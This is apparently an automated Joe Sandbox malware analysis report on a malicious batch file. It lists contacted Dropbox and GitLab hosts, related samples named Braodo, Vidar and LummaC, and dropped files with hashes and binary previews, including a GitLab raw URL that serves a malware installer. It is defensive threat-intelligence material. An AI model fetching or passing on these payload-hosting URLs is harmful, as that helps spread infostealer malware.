                                                                                                                                                                                              https://docs.google.com/spreadsheets/fsip/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                  162.125.65.18
                                                                                                                                                                                                  www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                  19679DROPBOXUSfalse
                                                                                                                                                                                                  172.65.251.78
                                                                                                                                                                                                  gitlab.comUnited States
                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                  Analysis ID:1580250
                                                                                                                                                                                                  Start date and time:2024-12-24 07:30:08 +01:00
                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                  Overall analysis duration:0h 6m 31s
                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                  Number of analysed new started processes analysed:19
                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                  Sample name:hnskdfgjgar22.bat
                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                  Classification:mal92.troj.evad.winBAT@28/619@3/2
                                                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                  • Number of executed functions: 32
                                                                                                                                                                                                  • Number of non-executed functions: 2
                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                  • Found application associated with file extension: .bat
                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 4.245.163.56, 13.107.246.63
                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7676 because it is empty
                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7728 because it is empty
                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7928 because it is empty
                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                  01:31:01API Interceptor116x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  162.125.65.18Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                          mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                              IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                  0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                    Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                                                                      172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      gitlab.comhnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      edge-block-www-env.dropbox-dns.comSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      www-env.dropbox-dns.comSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      DROPBOXUSSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 162.125.69.15
                                                                                                                                                                                                                      la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 162.125.232.208
                                                                                                                                                                                                                      https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      • 162.125.69.18
                                                                                                                                                                                                                      CLOUDFLARENETUSnabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 8.6.115.225
                                                                                                                                                                                                                      nklmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.29.132.180
                                                                                                                                                                                                                      eCompleted_419z.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.18.95.41
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.177.88
                                                                                                                                                                                                                      Adobe GenP 5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.29.252
                                                                                                                                                                                                                      Setup_W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.44.57
                                                                                                                                                                                                                      iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.195.241
                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.145.201
                                                                                                                                                                                                                      Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.199.72
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 104.21.48.1
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eProforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      WO.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      payment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      1lhZVZx5nD.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                                                                      • 172.65.251.78
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      C:\Users\Public\Document\Scripts\normalizer.exehngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        garsukhjdf11.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          C:\Users\Public\Document\Scripts\pip.exehngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                            garsukhjdf11.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):68976502
                                                                                                                                                                                                                              Entropy (8bit):7.994093691311639
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:1572864:w2PcFa0WKQw0Fpc9vBCUNyWpNBTvL3NauYsHg:NEa03R/1U8BTvL3NtYAg
                                                                                                                                                                                                                              MD5:D7CF87B06D6E297FAF4CC493F4B96E56
                                                                                                                                                                                                                              SHA1:848177B9CEAC2F18F1740D6DC41A3B9585DF29A1
                                                                                                                                                                                                                              SHA-256:4F9739AA561DFBB7C7CAA1D79D6777E31285FBBBB327BF6DEED917587BE0B791
                                                                                                                                                                                                                              SHA-512:F9F5C4945EE07975E58BAC8BEAF3C17FA438D8F38AFA08B2DA3D1A0BF432D4879BB1BAFDEC5D48AE83543EDAE12D5EA9DDFF88B7E821E9BF7575F41DCF05A87B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:PK.........,.Y................Scripts/PK.........=VX0p(Kt...........Scripts/normalizer.exe..`.U.0.dk.'..e.....,..5..M...R6......B;....lM;...EG.g.Q.e..q.aS......T,.R...,.m.....{.......}..~o...}..s.=....p.....p...~,...:..g..>...G.P9..X.|E....pYq.JSN..U..ii....b..6g.iean....x.....V...>.._.'G...R..k.|a...n.}...S...9...A....3.[...Y..]...v...u...9.4.....h......c F..cf5.....AM.......@.......}1I.MC.....|..U.%*$..S..H........W..$....8.....C...qY..s..l....4......t...$...YY...LT=.UM*..-Q..\4..W..L*.)...........py...p..f.......fp.....hp.tJ.9<....t.l.PvZ.s. .^JVqB.^.S....Ni..lW.7-...^g|......9N....k.7..%x.-.*N.c9n'..b..-.5.46^%O-.39$O.O...=.......*.9.h0.,O..8^/x.x.".}.$...&H...\.I.......nrH....0.z..J.&.$...r.......m...M.$..R. -...{Mw.t..'x...Z.X.Zo.......)..^.X($.5i>...{..NO^.\.s.Uj....h..?^-7u*. A...:..l....."_.A..V.w.%.V.Xy.=.J.P.6.....vkU.....M...C.9....$.ERo.....`...c4.?!Gq$^.4.}..8.-@.Z..J_./d...b..o....q4_.T.>.v._....a.k!7.....(.9.Sj..O
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 2.x), scale 27142-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 38685626227668133590597632.000000
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):31046
                                                                                                                                                                                                                              Entropy (8bit):5.265533758595518
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:A9gdk/PPz7bbK4UJ5O88oUExBs0yE3dRvJo9z35X2e5ncMh3y9ouCJ:ddknPK5B8odzn6z3V5ncMhC9od
                                                                                                                                                                                                                              MD5:867A653DB3E8155B9B102CAF3789EB9C
                                                                                                                                                                                                                              SHA1:6B72AE366B386FE1482712C92EAFA71D27ABB0B9
                                                                                                                                                                                                                              SHA-256:4A0ACF1B9165DC1F0BB2658539747396D5C78DA55A0230B1446C4E2D8581CBCE
                                                                                                                                                                                                                              SHA-512:30BE1B012DFC56AA85BED49262F09DBE8EB673133AC8FF415473F9E679B7CA9C308413FF956C718D5A38303B1A0F8EFDB93EBCDB4377069F432F5B97609A7452
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.........l.ewj........................h.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.d.l.Z...e.e.j...................j.....................e.j...........................d.........d.........Z...G.d...d.........Z.e.j.....................e.j...................e._...........e.e.j...........................e._...........e.e.j...........................e._.........g.d...Z.d.Z.d.Z.d.e.j$..................z...Z...e...d.Z...e...d...Z.d...Z.d...Z.d d...Z.d!d...Z.d"d...Z d"d...Z!d...Z"d...Z#d...Z$d...Z%d...Z&d...Z'd...Z(e)d.k(..r...e(..........y.y.#...d.d.l.Z.Y...x.Y.w.#.e.$.r...d.Z.d...Z.d...Z.d...Z.Y..\w.x.Y.w.#.e.$.r.....d.d...Z.d...Z.Y..lw.x.Y.w.)#.....Nz.pywin32_postinstall.log..wc...........................e.Z.d.Z.d...Z.d...Z.d...Z.y.)...Teec...........................|.|._.........y...N)...f)...self..files.... .uC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\../../Scripts/pywin32_postinstall.py..__init__z.Tee.__init__....s..................c...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4638
                                                                                                                                                                                                                              Entropy (8bit):5.317675397318066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ZwodWonjw4uFdJnd55vNEWTYEr9uP9cbx3:Zw2OFPnd5NTYEuPil
                                                                                                                                                                                                                              MD5:41671BA459D142D40397F832DE16EA77
                                                                                                                                                                                                                              SHA1:562D054EEAB225426E4E0CCE91627894CB8CFCDA
                                                                                                                                                                                                                              SHA-256:8170E7724D36B3685885E8961958EEDD62F2E8EF1A3A398EBCDA1E05E11B2F70
                                                                                                                                                                                                                              SHA-512:EB97DE481DB33E8C2E5EFB2374F28C7CB6F1FA6F9C1E7550ECDB12A483D9828FB5FE61DD4D59C757A68406F8890FA606746CA1228023F663BE801EBE1CDC72B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.........l.e................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j...................j...................e.........Z...e.j...........................g...e.j...........................z...Z.g.Z.d...Z.d...Z.d...Z.e.d.k(..r...e...........y.y.).z.A test runner for pywin32.....Nc..........................t.........j...................j...................|.........\...}.}.t.........j...................d.|.g.|.z...}.t.........d.|.z.............t.........j...................j.............................t.........j...................|.d.|...........}.t.........d.|...d.|.j.................................t.........j...................j.............................|.j...................r.t.........j...................|...........y.y.).Nz.-uz.--- Running '%s' ---F)...check..cwdz.*** Test script 'z.' exited with )...os..path..split..sys..executable..print..stdout..flush..subprocess..run..returncode..failures..append)...script..cmdline_extras..dirname..scriptname..cmd..results....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108444
                                                                                                                                                                                                                              Entropy (8bit):6.092160600743894
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+Gtu:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Au
                                                                                                                                                                                                                              MD5:E81D6B92F76B08EAB808FF59ACA13F33
                                                                                                                                                                                                                              SHA1:B588B48F292090E46277D924661F7ABDF4C63BCA
                                                                                                                                                                                                                              SHA-256:507498BC73E06611171AB5C765ACE6C8976C8025829EA31F332AB5A89B7CCED6
                                                                                                                                                                                                                              SHA-512:2F14682928D5141809AEF831E4CDCAF63E9A481EB6E8F94898DEABF17C0B23B8F936264692766E24C1EE06C428F157B070C45232BB5261DC19EBFD36A9A4B715
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                              • Filename: hngarm13de02.bat, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: garsukhjdf11.bat, Detection: malicious, Browse
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108432
                                                                                                                                                                                                                              Entropy (8bit):6.0921420023756525
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+GGr:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Hr
                                                                                                                                                                                                                              MD5:765951BB101AC5B187537DA554BF99EB
                                                                                                                                                                                                                              SHA1:E3DAE9D4B5DCD555A0A492ED0DF4A16B31317D57
                                                                                                                                                                                                                              SHA-256:00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                                                                                                                                                                                                                              SHA-512:976A2BCCD6119C082F08BE476220703552921B6286D1EC801226863D25B13D86DD81F90F6CC43FEF36E685275E9ECDFE0E00E2FD61D460C7DBB9F6444D233E53
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                              • Filename: hngarm13de02.bat, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: garsukhjdf11.bat, Detection: malicious, Browse
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108432
                                                                                                                                                                                                                              Entropy (8bit):6.0921420023756525
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+GGr:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Hr
                                                                                                                                                                                                                              MD5:765951BB101AC5B187537DA554BF99EB
                                                                                                                                                                                                                              SHA1:E3DAE9D4B5DCD555A0A492ED0DF4A16B31317D57
                                                                                                                                                                                                                              SHA-256:00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                                                                                                                                                                                                                              SHA-512:976A2BCCD6119C082F08BE476220703552921B6286D1EC801226863D25B13D86DD81F90F6CC43FEF36E685275E9ECDFE0E00E2FD61D460C7DBB9F6444D233E53
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108432
                                                                                                                                                                                                                              Entropy (8bit):6.0921420023756525
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+GGr:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Hr
                                                                                                                                                                                                                              MD5:765951BB101AC5B187537DA554BF99EB
                                                                                                                                                                                                                              SHA1:E3DAE9D4B5DCD555A0A492ED0DF4A16B31317D57
                                                                                                                                                                                                                              SHA-256:00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                                                                                                                                                                                                                              SHA-512:976A2BCCD6119C082F08BE476220703552921B6286D1EC801226863D25B13D86DD81F90F6CC43FEF36E685275E9ECDFE0E00E2FD61D460C7DBB9F6444D233E53
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
